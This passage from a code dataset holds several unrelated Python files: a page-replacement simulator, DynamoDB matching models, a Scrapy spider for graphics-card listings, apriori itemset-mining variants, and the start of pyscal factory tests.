test.count(True) > 1: better = \"empate\"\n \n print(\"\\n{:>4}|{:>4}|{:>4}|{:>4}|{:>4}\".format(self.algorithms_page_exchange['FIFO'], self.algorithms_page_exchange['MRU'], self.algorithms_page_exchange['NUF'], self.algorithms_page_exchange['OPTIMAL'], better), end='')\n\n def is_this_page_in_frames(self, page):\n # checando se a pagina ja está em alguma moldura\n for frame in self.frames:\n if page == frame:\n return True\n return False\n \n def NUF_algorithm_inside_part(self, page):\n # ver se a pagina ja está em alguma moldura\n if self.is_this_page_in_frames(page):\n self.NUF_aux[self.frames.index(page)] += 1 # adicona um acesso\n return\n else:\n # ver se tem alguma moldura vazia\n self.algorithms_page_exchange['NUF'] += 1\n for i, frame in enumerate(self.frames):\n if frame == False:\n self.frames[i] = page\n self.NUF_aux[i] = 1\n return\n\n # ver qual página tem a menor frequencia de uso\n index = self.NUF_aux.index(min(self.NUF_aux))\n # print(\"index: \", index)\n self.frames[index] = page\n self.NUF_aux[index] = 1\n \n # # ver qual página tem a menor frequencia de uso\n # min_aux = 
\n\n    def NUF_algorithm(self):\n        self.reset()\n        self.NUF_aux = [0]*self.n_frames\n        i = 0\n        while len(self.sequential_page_accesses) > 0:\n            page = self.sequential_page_accesses.pop(0)\n            self.NUF_algorithm_inside_part(page)\n            # print(\"page: \", page)\n            # print(\"Frames:\", self.frames)\n            # print(\"NUF_aux:\", self.NUF_aux)\n            # print()\n\n            # # simple aging scheme\n            # if i % self.n_frames == 0:\n            #     for j in range(self.n_frames): self.NUF_aux[j] = int(self.NUF_aux[j]/2)\n            i += 1\n        # print(\"Number of page swaps: \", self.algorithms_page_exchange['NUF'])\n\n\n    # NB: \"MRU\" here follows the Portuguese \"Menos Recentemente Usada\", i.e. it evicts the\n    # least-recently-used page (LRU in the usual English naming).\n    def MRU_algorithm_inside_part(self, page):\n        # check whether the page is already in some frame\n        if self.is_this_page_in_frames(page):\n            self.MRU_aux.remove(page)\n            self.MRU_aux.insert(0, page)\n            return\n        else:\n            # check whether there is an empty frame\n            self.algorithms_page_exchange['MRU'] += 1\n            for i, frame in enumerate(self.frames):\n                if frame == False:\n                    self.frames[i] = page\n                    self.MRU_aux.insert(0, page)\n                    return\n\n            # find the page that has gone unused the longest\n            removed_page = self.MRU_aux.pop()\n            self.MRU_aux.insert(0, page)\n            self.frames[self.frames.index(removed_page)] = page\n\n    def MRU_algorithm(self):\n        self.reset()\n        while len(self.sequential_page_accesses) > 0:\n            page = self.sequential_page_accesses.pop(0)\n            # print(\"page: \",page)\n            self.MRU_algorithm_inside_part(page)\n\n            # print(\"frames: \", self.frames)\n            # print(\"FIFO  : \", self.FIFO_aux)\n            # print()\n        # print(\"Number of page swaps: \", self.algorithms_page_exchange['MRU'])\n\n    def FIFO_algorithm_inside_part(self, page):\n        # check whether the page is already in some frame\n        if self.is_this_page_in_frames(page):\n            # self.FIFO_aux.remove(page)\n            # self.FIFO_aux.insert(0, page)\n            return\n        else:\n            # check whether there is an empty frame\n            self.algorithms_page_exchange['FIFO'] += 1\n            for i, frame in enumerate(self.frames):\n                if frame == False:\n                    self.frames[i] = page\n                    self.FIFO_aux.insert(0, page)\n                    return\n\n            # find the page that has been in a frame the longest\n            removed_page = self.FIFO_aux.pop()\n            self.FIFO_aux.insert(0, page)\n            self.frames[self.frames.index(removed_page)] = page\n\n    def FIFO_algorithm(self):\n        self.reset()\n        # self.FIFO_aux = []\n        while len(self.sequential_page_accesses) > 0:\n            page = self.sequential_page_accesses.pop(0)\n            # print(\"page: \",page)\n            self.FIFO_algorithm_inside_part(page)\n\n            # print(\"frames: \", self.frames)\n            # print(\"FIFO  : \", self.FIFO_aux)\n            # print()\n        # print(\"Number of page swaps: \", self.algorithms_page_exchange['FIFO'])
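\n\n    # Added sketch (illustrative): Belady's optimal policy evicts the page whose next\n    # use lies farthest ahead; the per-frame scan in the method below is equivalent to:\n    #   dist = self.sequential_page_accesses.index(frame) if frame in self.sequential_page_accesses else len(self.sequential_page_accesses)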
\n\n    def optimal_algorithm_inside_part(self, page):\n        # check whether the page is already in some frame\n        if self.is_this_page_in_frames(page):\n            return\n        else:\n            # check whether there is an empty frame\n            self.algorithms_page_exchange['OPTIMAL'] += 1\n            for i, frame in enumerate(self.frames):\n                if frame == False:\n                    self.frames[i] = page\n                    return\n\n            # find the frame holding the page whose next access is farthest away\n            distance_to_be_called = [0]*self.n_frames\n            for i, frame in enumerate(self.frames):\n                for aux_page in self.sequential_page_accesses:\n                    if frame == aux_page:\n                        break\n                    distance_to_be_called[i] += 1\n                # check whether the frame holds a page that is never accessed again\n                if distance_to_be_called[i] == len(self.sequential_page_accesses):\n                    # print(\"dist: \", distance_to_be_called[i], \"len: \", len(self.sequential_page_accesses))\n                    # print(self.frames[i], \"is never accessed again\")\n                    self.frames[i] = page\n                    return\n            index = distance_to_be_called.index(max(distance_to_be_called))\n            # print(\"index: \", index)\n            self.frames[index] = page\n            # print(\"dtbc: \", distance_to_be_called)\n\n    def optimal_algorithm(self):\n        self.reset()\n        while len(self.sequential_page_accesses) > 0:\n            page = self.sequential_page_accesses.pop(0)\n            # print(\"page: \",page)\n            self.optimal_algorithm_inside_part(page)\n\n        # print(self.frames)\n        # print(\"Number of page swaps: \", self.algorithms_page_exchange['OPTIMAL'])\n\ndef main():\n    arq = open(path, \"r\").readlines()\n    print('FIFO| MRU| NUF|OPTIMAL', end='')\n    for i, line in enumerate(arq):\n        # print(\"\\nline:\", i)\n        manager = Manager(line)\n        manager.output()\n\nif __name__ == '__main__':\n    # command-line options received as arguments when the program runs are defined here.\n    print(\"if in doubt, run 'python3 main.py -h'\", file=sys.stderr)\n    parser = argparse.ArgumentParser(description = \"Simulator of page replacement algorithms in memory {:>>11} by: Lucas T. G.\".format(''))\n    parser.add_argument('--arquivo', '-a', action = 'store', dest = 'path',\n                        required=True, help = \"File and/or directory with the input data (this argument is required).\")\n\n    args = parser.parse_args()\n    path = args.path\n    main()","repo_name":"Lucas-t-g/Simulador-de-algoritmos-de-substituicao-de-paginas-na-memoria","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":9527,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"6100471972","text":"import datetime\nimport json\nimport os\nimport random\nimport time\nimport uuid\n\nimport lambdae.shared as shared\n\nfrom pynamodb.attributes import (UnicodeAttribute, UTCDateTimeAttribute)\nfrom pynamodb.models import Model\nimport pynamodb.exceptions\n\nUSERS_TABLE = shared.get_env_var(\"USERS_TABLE\")\nMATCHES_TABLE = shared.get_env_var(\"MATCHES_TABLE\")\n\nINTERVAL_MS = 50\n\n# Set by serverless when running locally/testing\nIS_LOCAL = \"IS_LOCAL\" in os.environ\n\n\nclass NoMatchException(Exception):\n    def __init__(self, msg: str):\n        self.msg = msg\n\n\nclass AbstractTimestampedModel(Model):\n    # Pass the callable (not its result) so every item gets a fresh timestamp;\n    # calling datetime.datetime.now() here would freeze one value at import time.\n    created_dt = UTCDateTimeAttribute(null=False, default=datetime.datetime.now)\n    updated_dt = UTCDateTimeAttribute(null=False)\n\n    def save(self, *args, **kwargs):\n        self.updated_dt = datetime.datetime.now()\n        super(AbstractTimestampedModel, self).save(*args, **kwargs)\n\n    def __iter__(self):\n        for name, attr in self._get_attributes().items():\n            yield name, attr.serialize(getattr(self, name))\n\n\nclass UsersModel(AbstractTimestampedModel):\n    class Meta:\n        table_name = USERS_TABLE\n\n        if IS_LOCAL:\n            host = \"http://localhost:8000\"\n        else:\n            region = \"us-west-2\"\n\n    group_id = UnicodeAttribute(hash_key=True, null=False)\n    user_id = UnicodeAttribute(range_key=True, null=False)\n\n    username = UnicodeAttribute(null=False)\n    teamname = UnicodeAttribute(null=False)\n    email = UnicodeAttribute(null=False)\n    url = UnicodeAttribute(null=False)\n    avatar = UnicodeAttribute(null=False)\n\n\nclass MatchesModel(AbstractTimestampedModel):\n    class Meta:\n        table_name = MATCHES_TABLE\n\n        if IS_LOCAL:\n            host = \"http://localhost:8000\"\n        else:\n            region = \"us-west-2\"\n\n    group_id = 
UnicodeAttribute(hash_key=True, null=False)\n match_id = UnicodeAttribute(range_key=True, null=False)\n\n offerer_id = UnicodeAttribute(null=True)\n answerer_id = UnicodeAttribute(null=False)\n offer = UnicodeAttribute(null=True)\n answer = UnicodeAttribute(null=True)\n\n\ndef propose_match(user: UsersModel, offer: dict) -> MatchesModel:\n \"\"\"\n Propose matches to all in my group:\n On success: return the match record\n On failure: raise a NoMatchException\n \"\"\"\n HAS_NO_MATCH = MatchesModel.offerer_id.does_not_exist()\n\n # Get the unmatched people in my group, and shuffle them\n potential_matches = list(MatchesModel.query(user.group_id, filter_condition=HAS_NO_MATCH))\n random.shuffle(potential_matches)\n\n count = 0\n actions = [MatchesModel.offerer_id.set(user.user_id), MatchesModel.offer.set(json.dumps(offer))]\n for potential_match in potential_matches:\n try:\n potential_match.update(actions=actions, condition=HAS_NO_MATCH)\n return potential_match\n except pynamodb.exceptions.UpdateError:\n count += 1\n\n raise NoMatchException(\"Failed to match with %i other users\" % count)\n\n\ndef await_match(user: UsersModel, timeout_ms: int) -> MatchesModel:\n \"\"\"\n Await someone to propose a match to me.\n On success: return the match record\n On failure: raise a NoMatchException\n \"\"\"\n start_time = time.time()\n\n # No luck matching to someone else, so put my record in the table, and wait on it\n waiting_match = MatchesModel(\n group_id=user.group_id,\n match_id=str(uuid.uuid4()),\n offerer_id=None,\n answerer_id=user.user_id,\n offer=None,\n answer=None\n )\n waiting_match.save()\n\n while (time.time() - start_time) < (timeout_ms / 1000):\n try:\n waiting_match.refresh(consistent_read=True)\n except MatchesModel.DoesNotExist:\n # Timing out after possible reentrant deletion...\n raise NoMatchException(\"Match record deleted before await completed.\")\n\n # Success condition\n if waiting_match.offerer_id is not None:\n return waiting_match\n time.sleep(INTERVAL_MS / 1000)\n\n # Try to delete the match record, but only if unmatched\n try:\n waiting_match.delete(condition=MatchesModel.offerer_id.does_not_exist())\n except pynamodb.exceptions.DeleteError:\n try:\n waiting_match.refresh(consistent_read=True)\n except MatchesModel.DoesNotExist:\n # Timing out after possible reentrant deletion...\n raise NoMatchException(\"Match record deleted before await completed.\")\n\n return waiting_match\n\n raise NoMatchException(\"Waited for %ims but no one proposed a match.\" % timeout_ms)\n\n\ndef get_recent_matches(user: UsersModel) -> [str]:\n TIME_LIMIT_CONDITION = MatchesModel.created_dt < (datetime.datetime.utcnow() - datetime.timedelta(minutes=20))\n\n offered = MatchesModel.offerer_id == user.user_id\n answered = MatchesModel.answerer_id == user.user_id\n\n previous_partners = []\n # Matches where I was the offerer\n for match in MatchesModel.scan(user.group_id, filter_condition=offered & TIME_LIMIT_CONDITION):\n previous_partners.append(match.answerer_id)\n\n # Matches where I was the answerer\n for match in MatchesModel.scan(user.group_id, filter_condition=answered & TIME_LIMIT_CONDITION):\n previous_partners.append(match.offerer_id)\n\n return previous_partners\n","repo_name":"johnw188/watercoolerRoulette","sub_path":"backend/lambdae/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":5265,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"39556994669","text":"import scrapy\nimport re\n\nfrom 
SimpleSpiders.items import GpuVideoGraphicItem\nfrom scrapy.loader import ItemLoader\n\nclass GpusvideographicscardsSpider(scrapy.Spider):\n name = \"GpusVideoGraphicsCards\"\n allowed_domains = [\"www.newegg.com\"]\n start_urls = [\n \"https://www.newegg.com/GPUs-Video-Graphics-Cards/SubCategory/ID-48/Page-1?Tid=7709\"\n ]\n\n def __init__(self, pages=\"1,100\"):\n rangePages = pages.split(\",\")\n for i in range(int(rangePages[0]), int(rangePages[1]) + 1):\n list_url = \"https://www.newegg.com/GPUs-Video-Graphics-Cards/SubCategory/ID-48/Page-\"+ str(i) +\"?Tid=7709\"\n print(list_url)\n self.start_urls.append(list_url)\n\n def parse_detail(self, response, item):\n\n max_resolution = \"\"\n display_port = \"\"\n hdmi = \"\"\n direct_x = \"\"\n model = \"\"\n\n product_details = response.css(\"#product-details .tab-panes\")\n\n for table_horizontal in product_details.css(\".tab-pane:nth-child(2) .table-horizontal\"):\n if(table_horizontal.css(\"caption::text\").extract_first() == \"Model\"):\n tr = table_horizontal.css(\"tbody tr\")\n for r in tr:\n th = r.css(\"th::text\").extract_first()\n if(th == \"Model\"):\n td = r.css(\"td::text\").extract_first()\n model = td\n\n elif(table_horizontal.css(\"caption::text\").extract_first() == \"Ports\"):\n tr = table_horizontal.css(\"tbody tr\")\n for r in tr:\n th = r.css(\"th::text\").extract_first()\n if(th == \"DisplayPort\"):\n td = r.css(\"td::text\").extract_first()\n display_port = td\n if(th == \"HDMI\"):\n td = r.css(\"td::text\").extract_first()\n hdmi = td\n\n elif(table_horizontal.css(\"caption::text\").extract_first() == \"3D API\"):\n tr = table_horizontal.css(\"tbody tr\")\n for r in tr:\n th = r.css(\"th::text\").extract_first()\n if(th == \"DirectX\"):\n td = r.css(\"td::text\").extract_first()\n direct_x = td\n\n elif(table_horizontal.css(\"caption::text\").extract_first() == \"Details\"):\n tr = table_horizontal.css(\"tbody tr\")\n for r in tr:\n th = r.css(\"th::text\").extract_first()\n if(th == \"Max Resolution\"):\n td = r.css(\"td::text\").extract_first()\n max_resolution = td\n \n else:\n continue\n \n \n\n item[\"others\"] = {\n \"MaxResolution\": max_resolution,\n \"DisplayPort\": display_port,\n \"HDMI\": hdmi,\n \"DirectX\": direct_x,\n \"Model\": model\n }\n\n yield item\n\n\n def parse(self, response):\n\n for item in response.css(\".item-cell\"):\n\n detail_url = item.css(\".item-title::attr(\\\"href\\\")\").extract_first()\n\n price = item.css(\".price-current strong::text\").extract_first()\n price_decimal = item.css(\".price-current sup::text\").extract_first()\n\n price_current = \"0\"\n if(price and price_decimal):\n price_current = re.sub(\"\\D\",\"\",price) + price_decimal\n\n item_loader = ItemLoader(item = GpuVideoGraphicItem(), selector=item)\n item_loader.add_css(\"item_id\", \".item-title::attr(\\\"href\\\")\")\n item_loader.add_css(\"title\", \".item-title::text\")\n item_loader.add_css(\"brand\", \".item-brand img::attr(\\\"title\\\")\")\n item_loader.add_css(\"price_shipping\", \".price-ship::text\")\n item_loader.add_css(\"rating\", \"a.item-rating::attr(\\\"title\\\")\")\n item_loader.add_css(\"rating_num\", \"a.item-rating .item-rating-num::text\")\n item_loader.add_css(\"image_url\", \".item-img img::attr(\\\"src\\\")\")\n item_loader.add_value(\"price\", price_current)\n item_loader.add_value(\"url\", detail_url)\n item_loader.add_value(\"referer\", response.url)\n\n # yield item_loader.load_item()\n yield scrapy.Request(detail_url, callback=self.parse_detail, 
cb_kwargs=dict(item=item_loader.load_item()))\n \n # Collect pagination to get current page\n # CURRENT_SELECTOR = \".list-tool-pagination .btn-group .btn-group-cell .is-current::text\"\n # current_page = response.css(CURRENT_SELECTOR).extract_first()\n # if current_page:\n # next_page = int(current_page) + 1\n\n # print(\"Run next page: %s -> %s\", current_page, next_page)\n\n # yield scrapy.Request(\"https://www.newegg.com/GPUs-Video-Graphics-Cards/SubCategory/ID-48/Page-\"+ str(next_page) +\"?Tid=7709\")\n","repo_name":"brucent2610/DataEngineerCoaching","sub_path":"Projects/Project02/SimpleSpiders/SimpleSpiders/spiders/GpusVideoGraphicsCards.py","file_name":"GpusVideoGraphicsCards.py","file_ext":"py","file_size_in_byte":4897,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"74340996964","text":"import pandas as pd\nimport itertools\nimport time as time\nfrom collections import OrderedDict\n\n\ndata = pd.read_csv('sign.txt',header=None)\nD = []\nrecords = []\n\nfor i in range(0,len(data)):\n li = []\n li = data.values[i][0].split(' -1 ')\n li.sort()\n ma = {}\n for j in range(0,len(li)):\n ma[li[j]] = 1\n dict = OrderedDict(sorted(ma.items()))\n del dict['-2']\n D.append(dict)\n lis = []\n for key in dict.keys():\n \tlis.append(key)\n records.append(lis)\n\n\nD.sort(key=len)\nmod = 11\n\ndef add_to_ans(L):\n lis = []\n for key in L.keys():\n lis.append(key)\n return lis\n\ndef prune(itemset,l,n):\n for j in range(0,len(itemset)):\n i = ()\n for k in range(0,len(itemset)):\n if k!=j:\n i= i + (itemset[k],)\n if not i in l.keys():\n return False\n return True\n\n\ndef apriori_gen(Lk_1,k):\n C = list(Lk_1.keys())\n Ck = []\n for i in range(len(C)):\n for j in range(i+1,len(C)):\n s1 = C[i]\n s2 = C[j]\n flag = True\n for p in range(0,k-2):\n if s1[p] != s2[p]:\n flag = False\n break\n \n if flag:\n s1 = s1 + (s2[k-2],)\n Ck.append(s1)\n \n L = []\n for i in range(len(Ck)):\n if prune(Ck[i],Lk_1,k-1):\n L.append(Ck[i])\n \n return L\ndef stage_1(items, msp):\n c1 = {}\n for i in range(0,len(records)):\n \tfor j in range(0,len(records[i])):\n \t\tif records[i][j] in c1.keys():\n \t\t\tc1[records[i][j]] += 1\n \t\telse:\n \t\t\tc1[records[i][j]] = 1\n \n C = OrderedDict(sorted(c1.items()))\n l1 = {}\n for key in C.keys():\n if C[key] >= msp:\n l1[key] = C[key] \n \n return l1\ndef stage_2(l1, records, msp):\n l1 = list(l1.keys())\n L1 = list(itertools.combinations(l1, 2))\n C2 = {}\n L2 = {}\n for iter1 in L1:\n count = 0\n for iter2 in records:\n if(all(x in iter2 for x in iter1)):\n count+=1\n C2[iter1] = count\n\n C = OrderedDict(sorted(C2.items()))\n for key in C.keys():\n if C[key] >= msp:\n L2[key] = C[key]\n \n return L2\ndef stage_x(l2, records, msp,k):\n L2 = apriori_gen(l2, k)\n ck = {}\n lk = {}\n for iter1 in L2:\n count = 0\n for iter2 in records:\n if(all(x in iter2 for x in iter1)):\n count+=1\n ck[iter1] = count\n\n C = OrderedDict(sorted(ck.items()))\n for key in C.keys():\n if C[key] >= msp:\n \tlk[key] = C[key] \n \n return lk\n\ndef apriori(msp):\n\tans=[]\n\tL1 = stage_1(records, msp)\n\tans.append(add_to_ans(L1))\n\tlk = stage_2(L1, records, msp)\n\tk = 3\n\twhile len(lk) > 0:\n\t\tans.append(add_to_ans(lk))\n\t\tlk = stage_x(lk,records,msp,k)\n\t\tk+=1\n\treturn ans\n\n\ndef frequent_1(D,msp):\n C = {}\n for i in range(0,len(D)):\n for key in D[i].keys():\n if key in C.keys():\n C[key] += 1\n else:\n C[key] = 1\n \n C1 = OrderedDict(sorted(C.items()))\n \n L1 = {}\n for key in C1.keys():\n if C1[key] >= msp:\n 
L1[key] = C1[key]\n \n return L1\n\n\ndef present(trans,lis):\n for i in range(0,len(lis)):\n if not lis[i] in trans.keys():\n return False\n return True\n\n\ndef frequent_2(Lk_1,D,msp,idx):\n L = list(itertools.combinations(Lk_1,2))\n CK = {}\n for iter1 in L:\n count = 0\n for i in range(idx,len(D)):\n flag = 0\n if present(D[i],iter1):\n flag = 1\n if flag:\n if iter1 in CK.keys():\n CK[iter1] += 1\n else:\n CK[iter1] = 1\n \n C = OrderedDict(sorted(CK.items()))\n LK = {}\n for key in C.keys():\n if C[key] >= msp:\n LK[key] = C[key]\n return LK\n\ndef frequent_k_itemset(Lk_1, D, msp,k,idx):\n L = apriori_gen(Lk_1,k)\n CK = {}\n for iter1 in L:\n count = 0\n for i in range(idx,len(D)):\n flag = 0\n if present(D[i],iter1): \n flag = 1\n if flag:\n if iter1 in CK.keys():\n CK[iter1] += 1\n else:\n CK[iter1] = 1\n \n C = OrderedDict(sorted(CK.items()))\n LK = {}\n for key in C.keys():\n if C[key] >= msp:\n LK[key] = C[key]\n return LK\n\n\ndef update_transaction_database(D,k,idx):\n i = idx\n while i < len(D):\n if len(D[i]) >= k:\n break\n i+=1\n idx = i\n return idx\n\n\ndef add_to_ans(L):\n lis = []\n for key in L.keys():\n lis.append(key)\n return lis\n\ndef Transaction_Reduction(msp):\n ans = []\n idx = 0\n stage = 1\n L1 = frequent_1(D,msp)\n ans.append(add_to_ans(L1))\n\n stage += 1\n idx = update_transaction_database(D,stage,idx)\n Lk = frequent_2(L1,D,msp,idx)\n \n while len(Lk) > 0:\n ans.append(add_to_ans(Lk))\n stage += 1\n idx = update_transaction_database(D,stage,idx)\n Lk = frequent_k_itemset(Lk,D,msp,stage,idx)\n \n return ans\n\n\ndef hash_function(subset):\n s1 = subset[0]\n s2 = subset[1]\n sum1=0\n sum2=0\n for i in range(0,len(s1)):\n sum1+=ord(s1[i])\n sum1%=mod\n for i in range(0,len(s2)):\n sum2+=ord(s2[i])\n sum2%=mod\n idx = (sum1 + sum2)%mod\n return idx\n\n\ndef freq_1(D,msp):\n C = {}\n for i in range(0,len(D)):\n for key in D[i].keys():\n if key in C.keys():\n C[key] += 1\n else:\n C[key] = 1\n \n C1 = OrderedDict(sorted(C.items()))\n \n L1 = {}\n for key in C1.keys():\n if C1[key] >= msp:\n L1[key] = C1[key]\n\n hash_count = []\n for i in range(0,mod):\n hash_count.append(0)\n \n hash_table = {}\n for key in range(0,mod):\n hash_table[key] = {}\n \n di = {}\n for i in range(0,len(D)):\n lis = []\n if len(D[i]) <= 1:\n \tcontinue\n for key in D[i].keys():\n if key in L1.keys():\n lis.append(key)\n if len(lis) <= 1:\n \tcontinue\n subset = list(itertools.combinations(lis,2))\n for h in range(0,len(subset)):\n idx=0\n if subset[h] in di:\n idx = di[subset[h]]\n else:\n idx = hash_function(subset[h])\n di[subset[h]] = idx\n hash_count[idx] += 1\n if subset[h] in hash_table[idx].keys():\n \thash_table[idx][subset[h]] += 1\n else:\n \thash_table[idx][subset[h]] = 1\n \n \n return L1,hash_table,hash_count\n \n\ndef freq_2(hash_table,hash_count,msp):\n L2 = {}\n for i in range(0,mod):\n if hash_count[i] >= msp:\n for key in hash_table[i].keys():\n if hash_table[i][key] >= msp:\n L2[key] = hash_table[i][key]\n\n return L2\n\n \ndef Hash_Transaction_Reduction(msp):\n ans=[]\n idx2 = 0\n stage = 1\n L1,hash_table,hash_count = freq_1(D,msp)\n ans.append(add_to_ans(L1))\n\n stage += 1\n idx2 = update_transaction_database(D,stage,idx2)\n L2 = freq_2(hash_table,hash_count,msp)\n Lk = OrderedDict(sorted(L2.items()))\n \n while len(Lk) > 0:\n ans.append(add_to_ans(Lk))\n stage += 1\n idx2 = update_transaction_database(D,stage,idx2)\n Lk = frequent_k_itemset(Lk,D,msp,stage,idx2)\n \n return ans\n\n\ndef Hash_Based_Technique(msp):\n ans=[]\n idx2 = 0\n stage = 1\n 
L1,hash_table,hash_count = freq_1(D,msp)\n ans.append(add_to_ans(L1))\n\n stage += 1\n L2 = freq_2(hash_table,hash_count,msp)\n Lk = OrderedDict(sorted(L2.items()))\n \n while len(Lk) > 0:\n ans.append(add_to_ans(Lk))\n stage += 1\n Lk = frequent_k_itemset(Lk,D,msp,stage,idx2)\n \n return ans\n\n\n\n\nminimum_support = 300\nstart_time = time.time()\nans = Transaction_Reduction(minimum_support)\nend = (time.time()-start_time)\nprint(\"Transaction_Reduction\")\nprint(\"-- Time %s\" % (time.time()-start_time))\nprint(\"\")\nprint(ans)\nprint(\"\")\n\n\nstart_time = time.time()\nans = Hash_Based_Technique(minimum_support)\nend = (time.time()-start_time)\nprint(\"Hash_Based_Technique\")\nprint(\"-- Time %s\" % (time.time()-start_time))\nprint(\"\")\nprint(ans)\nprint(\"\")\n\nstart_time = time.time()\nans = Hash_Transaction_Reduction(minimum_support)\nend = (time.time()-start_time)\nprint(\"Hash_Transaction_Reduction\")\nprint(\"-- Time %s\" % (time.time()-start_time))\nprint(\"\")\nprint(ans)\nprint(\"\")\n\nstart_time = time.time()\nans = apriori(minimum_support)\nend = (time.time()-start_time)\nprint(\"Standard\")\nprint(\"-- Time %s\" % (time.time()-start_time))\nprint(\"\")\nprint(ans)\nprint(\"\")\n","repo_name":"Mehul3217/Frequent-Itemset-Mining-Project","sub_path":"apriori.py","file_name":"apriori.py","file_ext":"py","file_size_in_byte":8771,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"3980671448","text":"\"\"\"Test the PyscalFactory module\"\"\"\nimport os\nfrom pathlib import Path\n\nimport numpy as np\nimport pandas as pd\nimport pytest\n\nfrom pyscal import (\n GasOil,\n GasWater,\n PyscalFactory,\n SCALrecommendation,\n WaterOil,\n WaterOilGas,\n factory,\n)\nfrom pyscal.utils.testing import check_table, sat_table_str_ok\n\n\ndef test_factory_wateroil():\n \"\"\"Test that we can create curves from dictionaries of parameters\"\"\"\n pyscal_factory = PyscalFactory()\n\n # Factory refuses to create incomplete defaulted objects.\n with pytest.raises(ValueError):\n pyscal_factory.create_water_oil()\n\n with pytest.raises(TypeError):\n # (it must be a dictionary)\n # pylint: disable=unexpected-keyword-arg\n pyscal_factory.create_water_oil(swirr=0.01) # noqa\n\n with pytest.raises(TypeError):\n pyscal_factory.create_water_oil(params=\"swirr 0.01\")\n\n wateroil = pyscal_factory.create_water_oil(\n dict(\n swirr=0.01,\n swl=0.1,\n bogus=\"foobar\",\n tag=\"Good sand\",\n nw=3,\n now=2,\n krwend=0.2,\n krwmax=0.5,\n )\n )\n assert isinstance(wateroil, WaterOil)\n assert wateroil.swirr == 0.01\n assert wateroil.swl == 0.1\n assert wateroil.tag == \"Good sand\"\n assert \"KRW\" in wateroil.table\n assert \"Corey\" in wateroil.krwcomment\n assert wateroil.table[\"KRW\"].max() == 0.2 # Because sorw==0 by default\n check_table(wateroil.table)\n sat_table_str_ok(wateroil.SWOF())\n sat_table_str_ok(wateroil.SWFN())\n\n wateroil = pyscal_factory.create_water_oil(\n dict(nw=3, now=2, sorw=0.1, krwend=0.2, krwmax=0.5)\n )\n assert isinstance(wateroil, WaterOil)\n assert \"KRW\" in wateroil.table\n assert \"Corey\" in wateroil.krwcomment\n assert wateroil.table[\"KRW\"].max() == 0.5\n check_table(wateroil.table)\n sat_table_str_ok(wateroil.SWOF())\n sat_table_str_ok(wateroil.SWFN())\n\n # Ambiguous works, but we don't guarantee that this results\n # in LET or Corey.\n wateroil = pyscal_factory.create_water_oil(dict(nw=3, Lw=2, Ew=2, Tw=2, now=3))\n assert \"KRW\" in wateroil.table\n assert \"Corey\" in wateroil.krwcomment or \"LET\" in 
wateroil.krwcomment\n check_table(wateroil.table)\n sat_table_str_ok(wateroil.SWOF())\n sat_table_str_ok(wateroil.SWFN())\n\n # Mixing Corey and LET\n wateroil = pyscal_factory.create_water_oil(dict(Lw=2, Ew=2, Tw=2, krwend=1, now=4))\n assert isinstance(wateroil, WaterOil)\n assert \"KRW\" in wateroil.table\n assert wateroil.table[\"KRW\"].max() == 1.0\n assert \"LET\" in wateroil.krwcomment\n check_table(wateroil.table)\n sat_table_str_ok(wateroil.SWOF())\n sat_table_str_ok(wateroil.SWFN())\n\n wateroil = pyscal_factory.create_water_oil(\n dict(Lw=2, Ew=2, Tw=2, Low=3, Eow=3, Tow=3, krwend=0.5)\n )\n assert isinstance(wateroil, WaterOil)\n assert \"KRW\" in wateroil.table\n assert \"KROW\" in wateroil.table\n assert wateroil.table[\"KRW\"].max() == 0.5\n assert wateroil.table[\"KROW\"].max() == 1\n assert \"LET\" in wateroil.krwcomment\n assert \"LET\" in wateroil.krowcomment\n check_table(wateroil.table)\n sat_table_str_ok(wateroil.SWOF())\n sat_table_str_ok(wateroil.SWFN())\n\n # Add capillary pressure\n wateroil = pyscal_factory.create_water_oil(\n dict(swl=0.1, nw=1, now=1, a=2, b=-1, poro_ref=0.2, perm_ref=100, drho=200)\n )\n assert \"PC\" in wateroil.table\n assert wateroil.table[\"PC\"].max() > 0.0\n assert \"Simplified J\" in wateroil.pccomment\n check_table(wateroil.table)\n sat_table_str_ok(wateroil.SWOF())\n sat_table_str_ok(wateroil.SWFN())\n\n # Test that the optional gravity g is picked up:\n wateroil = pyscal_factory.create_water_oil(\n dict(swl=0.1, nw=1, now=1, a=2, b=-1, poro_ref=0.2, perm_ref=100, drho=200, g=0)\n )\n assert \"PC\" in wateroil.table\n assert wateroil.table[\"PC\"].max() == 0.0\n check_table(wateroil.table)\n sat_table_str_ok(wateroil.SWOF())\n sat_table_str_ok(wateroil.SWFN())\n\n # Test petrophysical simple J:\n wateroil = pyscal_factory.create_water_oil(\n dict(\n swl=0.1,\n nw=1,\n now=1,\n a_petro=2,\n b_petro=-1,\n poro_ref=0.2,\n perm_ref=100,\n drho=200,\n )\n )\n assert \"PC\" in wateroil.table\n assert wateroil.table[\"PC\"].max() > 0.0\n assert \"etrophysic\" in wateroil.pccomment\n check_table(wateroil.table)\n sat_table_str_ok(wateroil.SWOF())\n sat_table_str_ok(wateroil.SWFN())\n\n # One pc param missing:\n wateroil = pyscal_factory.create_water_oil(\n dict(swl=0.1, nw=1, now=1, a=2, b=-1, perm_ref=100, drho=200, g=0)\n )\n assert \"PC\" not in wateroil.table\n\n\ndef test_fast_mode():\n \"\"\"Test that the fast-flag is passed on to constructed objects\n\n Each object's own test code tests the actual effects of the fast flag\"\"\"\n wateroil = PyscalFactory.create_water_oil({\"nw\": 2, \"now\": 2})\n assert not wateroil.fast\n wateroil = PyscalFactory.create_water_oil({\"nw\": 2, \"now\": 2}, fast=True)\n assert wateroil.fast\n\n gasoil = PyscalFactory.create_gas_oil({\"ng\": 2, \"nog\": 2})\n assert not gasoil.fast\n gasoil = PyscalFactory.create_gas_oil({\"ng\": 2, \"nog\": 2}, fast=True)\n assert gasoil.fast\n\n gaswater = PyscalFactory.create_gas_water({\"nw\": 2, \"ng\": 2})\n assert not gaswater.gasoil.fast\n assert not gaswater.wateroil.fast\n gaswater = PyscalFactory.create_gas_water({\"nw\": 2, \"ng\": 2}, fast=True)\n assert gaswater.gasoil.fast\n assert gaswater.wateroil.fast\n assert gaswater.fast\n\n wateroilgas = 